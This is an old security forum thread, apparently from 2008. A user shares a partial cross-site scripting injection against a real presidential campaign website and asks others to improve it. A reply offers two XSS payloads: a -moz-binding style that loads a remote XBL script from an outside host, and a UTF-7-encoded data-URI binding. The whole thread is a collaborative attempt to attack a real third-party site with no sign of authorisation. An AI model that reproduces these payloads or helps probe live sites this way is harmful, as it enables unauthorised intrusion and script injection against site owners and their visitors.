Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Possible Hilary Clinton XSS
Posted by: PaPPy
Date: May 28, 2008 01:16PM

Been working at this for some time but cant seem to get anything to work

http://www.hillaryclinton.com/_base/error/?aspxerrorpath=/redirs/form/default.aspx&ref="><
but if i add anything after that it seems to fail...

well just throwing it out there if anyone can improve on my failure

Options: ReplyQuote
Re: Possible Hilary Clinton XSS
Posted by: Jiu
Date: May 28, 2008 04:33PM

"style="-moz-binding:url('//ha.ckers.org/xssmoz.xml%23xss');

Seems that no more works on FF2 :(

"style="-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-?xml version='1.0'?%2bAD4APA-bindings xmlns='http://www.mozilla.org/xbl'%2bAD4APA-binding%20id='xss'%2bAD4APA-implementation%2bAD4APA-constructor%2bAD4-alert('XSS');%2bAPA-/constructor%2bAD4APA-/implementation%2bAD4APA-/binding%2bAD4APA-/bindings%2bAD4-);

Dont work, perhaps you cant use utf-7 here ^^



Edited 2 time(s). Last edit at 05/28/2008 04:38PM by Jiu.

Options: ReplyQuote


Sorry, only registered users may post in this forum.